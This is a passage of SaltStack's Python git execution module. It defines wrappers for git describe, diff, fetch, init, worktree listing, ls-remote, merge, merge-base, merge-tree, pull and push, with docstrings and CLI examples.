cwd
The path to the git checkout
rev : HEAD
The revision to describe
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-describe(1)`: http://git-scm.com/docs/git-describe
CLI Examples:
.. code-block:: bash
salt myminion git.describe /path/to/repo
salt myminion git.describe /path/to/repo develop
'''
cwd = _expand_path(cwd, user)
if not isinstance(rev, six.string_types):
rev = str(rev)
command = ['git', 'describe']
if _LooseVersion(version(versioninfo=False)) >= _LooseVersion('1.5.6'):
command.append('--always')
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def diff(cwd,
item1=None,
item2=None,
opts='',
user=None,
no_index=False,
cached=False,
paths=None):
'''
.. versionadded:: 2015.8.12,2016.3.3
Interface to `git-diff(1)`_
cwd
The path to the git checkout
item1 and item2
Revision(s) to pass to the ``git diff`` command. One or both of these
arguments may be ignored if some of the options below are set to
``True``. When ``cached`` is ``False``, and no revisions are passed
to this function, then the current working tree will be compared
against the index (i.e. unstaged changes). When two revisions are
passed, they will be compared to each other.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
no_index : False
When it is necessary to diff two files in the same repo against each
other, and not diff two different revisions, set this option to
``True``. If this is left ``False`` in these instances, then a normal
``git diff`` will be performed against the index (i.e. unstaged
changes), and files in the ``paths`` option will be used to narrow down
the diff output.
.. note::
Requires Git 1.5.1 or newer. Additionally, when set to ``True``,
``item1`` and ``item2`` will be ignored.
cached : False
If ``True``, compare staged changes to ``item1`` (if specified),
otherwise compare them to the most recent commit.
.. note::
``item2`` is ignored if this option is is set to ``True``.
paths
File paths to pass to the ``git diff`` command. Can be passed as a
comma-separated list or a Python list.
.. _`git-diff(1)`: http://git-scm.com/docs/git-diff
CLI Example:
.. code-block:: bash
# Perform diff against the index (staging area for next commit)
salt myminion git.diff /path/to/repo
# Compare staged changes to the most recent commit
salt myminion git.diff /path/to/repo cached=True
# Compare staged changes to a specific revision
salt myminion git.diff /path/to/repo mybranch cached=True
# Perform diff against the most recent commit (includes staged changes)
salt myminion git.diff /path/to/repo HEAD
# Diff two commits
salt myminion git.diff /path/to/repo abcdef1 aabbccd
# Diff two commits, only showing differences in the specified paths
salt myminion git.diff /path/to/repo abcdef1 aabbccd paths=path/to/file1,path/to/file2
# Diff two files with one being outside the working tree
salt myminion git.diff /path/to/repo no_index=True paths=path/to/file1,/absolute/path/to/file2
'''
if no_index and cached:
raise CommandExecutionError(
'The \'no_index\' and \'cached\' options cannot be used together'
)
command = ['git', 'diff']
command.extend(_format_opts(opts))
if paths is not None and not isinstance(paths, (list, tuple)):
try:
paths = paths.split(',')
except AttributeError:
paths = str(paths).split(',')
ignore_retcode = False
failhard = True
if no_index:
if _LooseVersion(version(versioninfo=False)) < _LooseVersion('1.5.1'):
raise CommandExecutionError(
'The \'no_index\' option is only supported in Git 1.5.1 and '
'newer'
)
ignore_retcode = True
failhard = False
command.append('--no-index')
for value in [x for x in (item1, item2) if x]:
log.warning(
'Revision \'%s\' ignored in git diff, as revisions cannot be '
'used when no_index=True', value
)
elif cached:
command.append('--cached')
if item1:
command.append(item1)
if item2:
log.warning(
'Second revision \'%s\' ignored in git diff, at most one '
'revision is considered when cached=True', item2
)
else:
for value in [x for x in (item1, item2) if x]:
command.append(value)
if paths:
command.append('--')
command.extend(paths)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
failhard=failhard,
redirect_stderr=True)['stdout']
def fetch(cwd,
remote=None,
force=False,
refspecs=None,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base'):
'''
.. versionchanged:: 2015.8.2
Return data is now a dictionary containing information on branches and
tags that were added/updated
Interface to `git-fetch(1)`_
cwd
The path to the git checkout
remote
Optional remote name to fetch. If not passed, then git will use its
default behavior (as detailed in `git-fetch(1)`_).
.. versionadded:: 2015.8.0
force
Force the fetch even when it is not a fast-forward.
.. versionadded:: 2015.8.0
refspecs
Override the refspec(s) configured for the remote with this argument.
Multiple refspecs can be passed, comma-separated.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-fetch(1)`: http://git-scm.com/docs/git-fetch
CLI Example:
.. code-block:: bash
salt myminion git.fetch /path/to/repo upstream
salt myminion git.fetch /path/to/repo identity=/root/.ssh/id_rsa
'''
cwd = _expand_path(cwd, user)
command = ['git', 'fetch']
if force:
command.append('--force')
command.extend(
[x for x in _format_opts(opts) if x not in ('-f', '--force')]
)
if remote:
if not isinstance(remote, six.string_types):
remote = str(remote)
command.append(remote)
if refspecs is not None:
if isinstance(refspecs, (list, tuple)):
refspec_list = []
for item in refspecs:
if not isinstance(item, six.string_types):
refspec_list.append(str(item))
else:
refspec_list.append(item)
else:
if not isinstance(refspecs, six.string_types):
refspecs = str(refspecs)
refspec_list = refspecs.split(',')
command.extend(refspec_list)
output = _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
redirect_stderr=True,
saltenv=saltenv)['stdout']
update_re = re.compile(
r'[\s*]*(?:([0-9a-f]+)\.\.([0-9a-f]+)|'
r'\[(?:new (tag|branch)|tag update)\])\s+(.+)->'
)
ret = {}
for line in salt.utils.itertools.split(output, '\n'):
match = update_re.match(line)
if match:
old_sha, new_sha, new_ref_type, ref_name = \
match.groups()
ref_name = ref_name.rstrip()
if new_ref_type is not None:
# ref is a new tag/branch
ref_key = 'new tags' \
if new_ref_type == 'tag' \
else 'new branches'
ret.setdefault(ref_key, []).append(ref_name)
elif old_sha is not None:
# ref is a branch update
ret.setdefault('updated branches', {})[ref_name] = \
{'old': old_sha, 'new': new_sha}
else:
# ref is an updated tag
ret.setdefault('updated tags', []).append(ref_name)
return ret
def init(cwd,
bare=False,
template=None,
separate_git_dir=None,
shared=None,
opts='',
user=None,
ignore_retcode=False):
'''
Interface to `git-init(1)`_
cwd
The path to the directory to be initialized
bare : False
If ``True``, init a bare repository
.. versionadded:: 2015.8.0
template
Set this argument to specify an alternate `template directory`_
.. versionadded:: 2015.8.0
separate_git_dir
Set this argument to specify an alternate ``$GIT_DIR``
.. versionadded:: 2015.8.0
shared
Set sharing permissions on git repo. See `git-init(1)`_ for more
details.
.. versionadded:: 2015.8.0
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-init(1)`: http://git-scm.com/docs/git-init
.. _`template directory`: http://git-scm.com/docs/git-init#_template_directory
CLI Examples:
.. code-block:: bash
salt myminion git.init /path/to/repo
# Init a bare repo (before 2015.8.0)
salt myminion git.init /path/to/bare/repo.git opts='--bare'
# Init a bare repo (2015.8.0 and later)
salt myminion git.init /path/to/bare/repo.git bare=True
'''
cwd = _expand_path(cwd, user)
command = ['git', 'init']
if bare:
command.append('--bare')
if template is not None:
if not isinstance(template, six.string_types):
template = str(template)
command.append('--template={0}'.format(template))
if separate_git_dir is not None:
if not isinstance(separate_git_dir, six.string_types):
separate_git_dir = str(separate_git_dir)
command.append('--separate-git-dir={0}'.format(separate_git_dir))
if shared is not None:
if isinstance(shared, six.integer_types):
shared = '0' + str(shared)
elif not isinstance(shared, six.string_types):
# Using lower here because booleans would be capitalized when
# converted to a string.
shared = str(shared).lower()
command.append('--shared={0}'.format(shared))
command.extend(_format_opts(opts))
command.append(cwd)
return _git_run(command,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def is_worktree(cwd, user=None):
'''
.. versionadded:: 2015.8.0
This function will attempt to determine if ``cwd`` is part of a
worktree by checking its ``.git`` to see if it is a file containing a
reference to another gitdir.
cwd
path to the worktree to be removed
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
CLI Example:
.. code-block:: bash
salt myminion git.is_worktree /path/to/repo
'''
cwd = _expand_path(cwd, user)
try:
toplevel = _get_toplevel(cwd)
except CommandExecutionError:
return False
gitdir = os.path.join(toplevel, '.git')
try:
with salt.utils.fopen(gitdir, 'r') as fp_:
for line in fp_:
try:
label, path = line.split(None, 1)
except ValueError:
return False
else:
# This file should only contain a single line. However, we
# loop here to handle the corner case where .git is a large
# binary file, so that we do not read the entire file into
# memory at once. We'll hit a return statement before this
# loop enters a second iteration.
if label == 'gitdir:' and os.path.isabs(path):
return True
else:
return False
except IOError:
return False
return False
def list_branches(cwd, remote=False, user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Return a list of branches
cwd
The path to the git checkout
remote : False
If ``True``, list remote branches. Otherwise, local branches will be
listed.
.. warning::
This option will only return remote branches of which the local
checkout is aware, use :py:func:`git.fetch
<salt.modules.git.fetch>` to update remotes.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.list_branches /path/to/repo
salt myminion git.list_branches /path/to/repo remote=True
'''
cwd = _expand_path(cwd, user)
command = ['git', 'for-each-ref', '--format', '%(refname:short)',
'refs/{0}/'.format('heads' if not remote else 'remotes')]
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout'].splitlines()
def list_tags(cwd, user=None, ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Return a list of tags
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
CLI Examples:
.. code-block:: bash
salt myminion git.list_tags /path/to/repo
'''
cwd = _expand_path(cwd, user)
command = ['git', 'for-each-ref', '--format', '%(refname:short)',
'refs/tags/']
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout'].splitlines()
def list_worktrees(cwd, stale=False, user=None, **kwargs):
'''
.. versionadded:: 2015.8.0
Returns information on worktrees
.. versionchanged:: 2015.8.4
Version 2.7.0 added the ``list`` subcommand to `git-worktree(1)`_ which
provides a lot of additional information. The return data has been
changed to include this information, even for pre-2.7.0 versions of
git. In addition, if a worktree has a detached head, then any tags
which point to the worktree's HEAD will be included in the return data.
.. note::
By default, only worktrees for which the worktree directory is still
present are returned, but this can be changed using the ``all`` and
``stale`` arguments (described below).
cwd
The path to the git checkout
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
all : False
If ``True``, then return all worktrees tracked under
$GIT_DIR/worktrees, including ones for which the gitdir is no longer
present.
stale : False
If ``True``, return *only* worktrees whose gitdir is no longer present.
.. note::
Only one of ``all`` and ``stale`` can be set to ``True``.
.. _`git-worktree(1)`: http://git-scm.com/docs/git-worktree
CLI Examples:
.. code-block:: bash
salt myminion git.list_worktrees /path/to/repo
salt myminion git.list_worktrees /path/to/repo all=True
salt myminion git.list_worktrees /path/to/repo stale=True
'''
if not _check_worktree_support(failhard=True):
return {}
cwd = _expand_path(cwd, user)
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if all_ and stale:
raise CommandExecutionError(
'\'all\' and \'stale\' cannot both be set to True'
)
def _git_tag_points_at(cwd, rev, user=None):
'''
Get any tags that point at a
'''
return _git_run(['git', 'tag', '--points-at', rev],
cwd=cwd,
runas=user)['stdout'].splitlines()
def _desired(is_stale, all_, stale):
'''
Common logic to determine whether or not to include the worktree info
in the return data.
'''
if is_stale:
if not all_ and not stale:
# Stale worktrees are not desired, skip this one
return False
else:
if stale:
# Only stale worktrees are desired, skip this one
return False
return True
def _duplicate_worktree_path(path):
'''
Log errors to the minion log notifying of duplicate worktree paths.
These should not be there, but may show up due to a bug in git 2.7.0.
'''
log.error(
'git.worktree: Duplicate worktree path {0}. This may be caused by '
'a known issue in git 2.7.0 (see '
'http://permalink.gmane.org/gmane.comp.version-control.git/283998)'
.format(path)
)
tracked_data_points = ('worktree', 'HEAD', 'branch')
ret = {}
git_version = _LooseVersion(version(versioninfo=False))
has_native_list_subcommand = git_version >= _LooseVersion('2.7.0')
if has_native_list_subcommand:
out = _git_run(['git', 'worktree', 'list', '--porcelain'],
cwd=cwd,
runas=user)
if out['retcode'] != 0:
msg = 'Failed to list worktrees'
if out['stderr']:
msg += ': {0}'.format(out['stderr'])
raise CommandExecutionError(msg)
def _untracked_item(line):
'''
Log a warning
'''
log.warning(
'git.worktree: Untracked line item \'{0}\''.format(line)
)
for individual_worktree in \
salt.utils.itertools.split(out['stdout'].strip(), '\n\n'):
# Initialize the dict where we're storing the tracked data points
worktree_data = dict([(x, '') for x in tracked_data_points])
for line in salt.utils.itertools.split(individual_worktree, '\n'):
try:
type_, value = line.strip().split(None, 1)
except ValueError:
if line == 'detached':
type_ = 'branch'
value = 'detached'
else:
_untracked_item(line)
continue
if type_ not in tracked_data_points:
_untracked_item(line)
continue
if worktree_data[type_]:
log.error(
'git.worktree: Unexpected duplicate {0} entry '
'\'{1}\', skipping'.format(type_, line)
)
continue
worktree_data[type_] = value
# Check for missing data points
missing = [x for x in tracked_data_points if not worktree_data[x]]
if missing:
log.error(
'git.worktree: Incomplete worktree data, missing the '
'following information: {0}. Full data below:\n{1}'
.format(', '.join(missing), individual_worktree)
)
continue
worktree_is_stale = not os.path.isdir(worktree_data['worktree'])
if not _desired(worktree_is_stale, all_, stale):
continue
if worktree_data['worktree'] in ret:
_duplicate_worktree_path(worktree_data['worktree'])
wt_ptr = ret.setdefault(worktree_data['worktree'], {})
wt_ptr['stale'] = worktree_is_stale
wt_ptr['HEAD'] = worktree_data['HEAD']
wt_ptr['detached'] = worktree_data['branch'] == 'detached'
if wt_ptr['detached']:
wt_ptr['branch'] = None
# Check to see if HEAD points at a tag
tags_found = _git_tag_points_at(cwd, wt_ptr['HEAD'], user)
if tags_found:
wt_ptr['tags'] = tags_found
else:
wt_ptr['branch'] = \
worktree_data['branch'].replace('refs/heads/', '', 1)
return ret
else:
toplevel = _get_toplevel(cwd, user)
try:
worktree_root = rev_parse(cwd,
opts=['--git-path', 'worktrees'],
user=user)
except CommandExecutionError as exc:
msg = 'Failed to find worktree location for ' + cwd
log.error(msg, exc_info_on_loglevel=logging.DEBUG)
raise CommandExecutionError(msg)
if worktree_root.startswith('.git'):
worktree_root = os.path.join(cwd, worktree_root)
if not os.path.isdir(worktree_root):
raise CommandExecutionError(
'Worktree admin directory {0} not present'
.format(worktree_root)
)
def _read_file(path):
'''
Return contents of a single line file with EOF newline stripped
'''
try:
with salt.utils.fopen(path, 'r') as fp_:
for line in fp_:
ret = line.strip()
# Ignore other lines, if they exist (which they
# shouldn't)
break
return ret
except (IOError, OSError) as exc:
# Raise a CommandExecutionError
salt.utils.files.process_read_exception(exc, path)
for worktree_name in os.listdir(worktree_root):
admin_dir = os.path.join(worktree_root, worktree_name)
gitdir_file = os.path.join(admin_dir, 'gitdir')
head_file = os.path.join(admin_dir, 'HEAD')
wt_loc = _read_file(gitdir_file)
head_ref = _read_file(head_file)
if not os.path.isabs(wt_loc):
log.error(
'Non-absolute path found in {0}. If git 2.7.0 was '
'installed and then downgraded, this was likely caused '
'by a known issue in git 2.7.0. See '
'http://permalink.gmane.org/gmane.comp.version-control'
'.git/283998 for more information.'.format(gitdir_file)
)
# Emulate what 'git worktree list' does under-the-hood, and
# that is using the toplevel directory. It will still give
# inaccurate results, but will avoid a traceback.
wt_loc = toplevel
if wt_loc.endswith('/.git'):
wt_loc = wt_loc[:-5]
worktree_is_stale = not os.path.isdir(wt_loc)
if not _desired(worktree_is_stale, all_, stale):
continue
if wt_loc in ret:
_duplicate_worktree_path(wt_loc)
if head_ref.startswith('ref: '):
head_ref = head_ref.split(None, 1)[-1]
wt_branch = head_ref.replace('refs/heads/', '', 1)
wt_head = rev_parse(cwd, rev=head_ref, user=user)
wt_detached = False
else:
wt_branch = None
wt_head = head_ref
wt_detached = True
wt_ptr = ret.setdefault(wt_loc, {})
wt_ptr['stale'] = worktree_is_stale
wt_ptr['branch'] = wt_branch
wt_ptr['HEAD'] = wt_head
wt_ptr['detached'] = wt_detached
# Check to see if HEAD points at a tag
if wt_detached:
tags_found = _git_tag_points_at(cwd, wt_head, user)
if tags_found:
wt_ptr['tags'] = tags_found
return ret
def ls_remote(cwd=None,
remote='origin',
ref=None,
opts='',
user=None,
identity=None,
https_user=None,
https_pass=None,
ignore_retcode=False,
saltenv='base'):
'''
Interface to `git-ls-remote(1)`_. Returns the upstream hash for a remote
reference.
cwd
The path to the git checkout. Optional (and ignored if present) when
``remote`` is set to a URL instead of a remote name.
remote : origin
The name of the remote to query. Can be the name of a git remote
(which exists in the git checkout defined by the ``cwd`` parameter),
or the URL of a remote repository.
.. versionchanged:: 2015.8.0
Argument renamed from ``repository`` to ``remote``
ref
The name of the ref to query. Optional, if not specified, all refs are
returned. Can be a branch or tag name, or the full name of the
reference (for example, to get the hash for a Github pull request number
1234, ``ref`` can be set to ``refs/pull/1234/head``
.. versionchanged:: 2015.8.0
Argument renamed from ``branch`` to ``ref``
.. versionchanged:: 2015.8.4
Defaults to returning all refs instead of master.
opts
Any additional options to add to the command line, in a single string
.. versionadded:: 2015.8.0
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
https_user
Set HTTP Basic Auth username. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
https_pass
Set HTTP Basic Auth password. Only accepted for HTTPS URLs.
.. versionadded:: 2015.5.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-ls-remote(1)`: http://git-scm.com/docs/git-ls-remote
CLI Example:
.. code-block:: bash
salt myminion git.ls_remote /path/to/repo origin master
salt myminion git.ls_remote remote=https://mydomain.tld/repo.git ref=mytag opts='--tags'
'''
if cwd is not None:
cwd = _expand_path(cwd, user)
try:
remote = salt.utils.url.add_http_basic_auth(remote,
https_user,
https_pass,
https_only=True)
except ValueError as exc:
raise SaltInvocationError(exc.__str__())
command = ['git', 'ls-remote']
command.extend(_format_opts(opts))
if not isinstance(remote, six.string_types):
remote = str(remote)
command.extend([remote])
if ref:
if not isinstance(ref, six.string_types):
ref = str(ref)
command.extend([ref])
output = _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
ret = {}
for line in output.splitlines():
try:
ref_sha1, ref_name = line.split(None, 1)
except IndexError:
continue
ret[ref_name] = ref_sha1
return ret
def merge(cwd,
rev=None,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
Interface to `git-merge(1)`_
cwd
The path to the git checkout
rev
Revision to merge into the current branch. If not specified, the remote
tracking branch will be merged.
.. versionadded:: 2015.8.0
branch
The remote branch or revision to merge into the current branch
Revision to merge into the current branch
.. deprecated:: 2015.8.0
Use ``rev`` instead.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
.. _`git-merge(1)`: http://git-scm.com/docs/git-merge
CLI Example:
.. code-block:: bash
# Fetch first...
salt myminion git.fetch /path/to/repo
# ... then merge the remote tracking branch
salt myminion git.merge /path/to/repo
# .. or merge another rev
salt myminion git.merge /path/to/repo rev=upstream/foo
'''
kwargs = salt.utils.clean_kwargs(**kwargs)
branch_ = kwargs.pop('branch', None)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
cwd = _expand_path(cwd, user)
if branch_:
salt.utils.warn_until(
'Nitrogen',
'The \'branch\' argument to git.merge has been deprecated, please '
'use \'rev\' instead.'
)
rev = branch_
command = ['git', 'merge']
command.extend(_format_opts(opts))
if rev:
if not isinstance(rev, six.string_types):
rev = str(rev)
command.append(rev)
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def merge_base(cwd,
refs=None,
octopus=False,
is_ancestor=False,
independent=False,
fork_point=None,
opts='',
user=None,
ignore_retcode=False,
**kwargs):
'''
.. versionadded:: 2015.8.0
Interface to `git-merge-base(1)`_.
cwd
The path to the git checkout
refs
Any refs/commits to check for a merge base. Can be passed as a
comma-separated list or a Python list.
all : False
Return a list of all matching merge bases. Not compatible with any of
the below options except for ``octopus``.
octopus : False
If ``True``, then this function will determine the best common
ancestors of all specified commits, in preparation for an n-way merge.
See here_ for a description of how these bases are determined.
Set ``all`` to ``True`` with this option to return all computed merge
bases, otherwise only the "best" will be returned.
is_ancestor : False
If ``True``, then instead of returning the merge base, return a
boolean telling whether or not the first commit is an ancestor of the
second commit.
.. note::
This option requires two commits to be passed.
.. versionchanged:: 2015.8.2
Works properly in git versions older than 1.8.0, where the
``--is-ancestor`` CLI option is not present.
independent : False
If ``True``, this function will return the IDs of the refs/commits
passed which cannot be reached by another commit.
fork_point
If passed, then this function will return the commit where the
commit diverged from the ref specified by ``fork_point``. If no fork
point is found, ``None`` is returned.
.. note::
At most one commit is permitted to be passed if a ``fork_point`` is
specified. If no commits are passed, then ``HEAD`` is assumed.
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
This option should not be necessary unless new CLI arguments are
added to `git-merge-base(1)`_ and are not yet supported in Salt.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
if ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-merge-base(1)`: http://git-scm.com/docs/git-merge-base
.. _here: http://git-scm.com/docs/git-merge-base#_discussion
CLI Examples:
.. code-block:: bash
salt myminion git.merge_base /path/to/repo HEAD upstream/mybranch
salt myminion git.merge_base /path/to/repo 8f2e542,4ad8cab,cdc9886 octopus=True
salt myminion git.merge_base /path/to/repo refs=8f2e542,4ad8cab,cdc9886 independent=True
salt myminion git.merge_base /path/to/repo refs=8f2e542,4ad8cab is_ancestor=True
salt myminion git.merge_base /path/to/repo fork_point=upstream/master
salt myminion git.merge_base /path/to/repo refs=mybranch fork_point=upstream/master
'''
cwd = _expand_path(cwd, user)
kwargs = salt.utils.clean_kwargs(**kwargs)
all_ = kwargs.pop('all', False)
if kwargs:
salt.utils.invalid_kwargs(kwargs)
if all_ and (independent or is_ancestor or fork_point):
raise SaltInvocationError(
'The \'all\' argument is not compatible with \'independent\', '
'\'is_ancestor\', or \'fork_point\''
)
if refs is None:
refs = []
elif not isinstance(refs, (list, tuple)):
refs = [x.strip() for x in str(refs).split(',')]
mutually_exclusive_count = len(
[x for x in (octopus, independent, is_ancestor, fork_point) if x]
)
if mutually_exclusive_count > 1:
raise SaltInvocationError(
'Only one of \'octopus\', \'independent\', \'is_ancestor\', and '
'\'fork_point\' is permitted'
)
elif is_ancestor:
if len(refs) != 2:
raise SaltInvocationError(
'Two refs/commits are required if \'is_ancestor\' is True'
)
elif fork_point:
if len(refs) > 1:
raise SaltInvocationError(
'At most one ref/commit can be passed if \'fork_point\' is '
'specified'
)
elif not refs:
refs = ['HEAD']
if not isinstance(fork_point, six.string_types):
fork_point = str(fork_point)
if is_ancestor:
if _LooseVersion(version(versioninfo=False)) < _LooseVersion('1.8.0'):
# Pre 1.8.0 git doesn't have --is-ancestor, so the logic here is a
# little different. First we need to resolve the first ref to a
# full SHA1, and then if running git merge-base on both commits
# returns an identical commit to the resolved first ref, we know
# that the first ref is an ancestor of the second ref.
first_commit = rev_parse(cwd,
rev=refs[0],
opts=['--verify'],
user=user,
ignore_retcode=ignore_retcode)
return merge_base(cwd,
refs=refs,
is_ancestor=False,
user=user,
ignore_retcode=ignore_retcode) == first_commit
command = ['git', 'merge-base']
command.extend(_format_opts(opts))
if all_:
command.append('--all')
if octopus:
command.append('--octopus')
elif is_ancestor:
command.append('--is-ancestor')
elif independent:
command.append('--independent')
elif fork_point:
command.extend(['--fork-point', fork_point])
for ref in refs:
if isinstance(ref, six.string_types):
command.append(ref)
else:
command.append(str(ref))
result = _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode,
failhard=False if is_ancestor else True)
if is_ancestor:
return result['retcode'] == 0
all_bases = result['stdout'].splitlines()
if all_:
return all_bases
return all_bases[0]
def merge_tree(cwd,
ref1,
ref2,
base=None,
user=None,
ignore_retcode=False):
'''
.. versionadded:: 2015.8.0
Interface to `git-merge-tree(1)`_, shows the merge results and conflicts
from a 3-way merge without touching the index.
cwd
The path to the git checkout
ref1
First ref/commit to compare
ref2
Second ref/commit to compare
base
The base tree to use for the 3-way-merge. If not provided, then
:py:func:`git.merge_base <salt.modules.git.merge_base>` will be invoked
on ``ref1`` and ``ref2`` to determine the merge base to use.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
ignore_retcode : False
if ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. _`git-merge-tree(1)`: http://git-scm.com/docs/git-merge-tree
CLI Examples:
.. code-block:: bash
salt myminion git.merge_tree /path/to/repo HEAD upstream/dev
salt myminion git.merge_tree /path/to/repo HEAD upstream/dev base=aaf3c3d
'''
cwd = _expand_path(cwd, user)
command = ['git', 'merge-tree']
if not isinstance(ref1, six.string_types):
ref1 = str(ref1)
if not isinstance(ref2, six.string_types):
ref2 = str(ref2)
if base is None:
try:
base = merge_base(cwd, refs=[ref1, ref2])
except (SaltInvocationError, CommandExecutionError):
raise CommandExecutionError(
'Unable to determine merge base for {0} and {1}'
.format(ref1, ref2)
)
command.extend([base, ref1, ref2])
return _git_run(command,
cwd=cwd,
runas=user,
ignore_retcode=ignore_retcode)['stdout']
def pull(cwd, opts='', user=None, identity=None, ignore_retcode=False, saltenv='base'):
'''
Interface to `git-pull(1)`_
cwd
The path to the git checkout
opts
Any additional options to add to the command line, in a single string
.. note::
On the Salt CLI, if the opts are preceded with a dash, it is
necessary to precede them with ``opts=`` (as in the CLI examples
below) to avoid causing errors with Salt's own argument parsing.
user
User under which to run the git command. By default, the command is run
by the user under which the minion is running.
identity
Path to a private key to use for ssh URLs
.. warning::
Unless Salt is invoked from the minion using ``salt-call``, the
key(s) must be passphraseless. For greater security with
passphraseless private keys, see the `sshd(8)`_ manpage for
information on securing the keypair from the remote side in the
``authorized_keys`` file.
.. _`sshd(8)`: http://www.man7.org/linux/man-pages/man8/sshd.8.html#AUTHORIZED_KEYS_FILE%20FORMAT
.. versionchanged:: 2015.8.7
Salt will no longer attempt to use passphrase-protected keys unless
invoked from the minion using ``salt-call``, to prevent blocking
waiting for user input.
Key can also be specified as a SaltStack file server URL, eg. salt://location/identity_file
.. versionchanged:: 2016.3.0
ignore_retcode : False
If ``True``, do not log an error to the minion log if the git command
returns a nonzero exit status.
.. versionadded:: 2015.8.0
saltenv
The default salt environment to pull sls files from
.. versionadded:: 2016.3.1
.. _`git-pull(1)`: http://git-scm.com/docs/git-pull
CLI Example:
.. code-block:: bash
salt myminion git.pull /path/to/repo opts='--rebase origin master'
'''
cwd = _expand_path(cwd, user)
command = ['git', 'pull']
command.extend(_format_opts(opts))
return _git_run(command,
cwd=cwd,
runas=user,
identity=identity,
ignore_retcode=ignore_retcode,
saltenv=saltenv)['stdout']
def push(cwd,
remote=None,
ref=None,
opts='',
user=None,
identity=None,
ignore_retcode=False,
saltenv='base',
**kwargs):
'''
Interface to `git-push(1)`_
cwd
The path to the git checkout
remote
Name of the remote to which the ref should being pushed
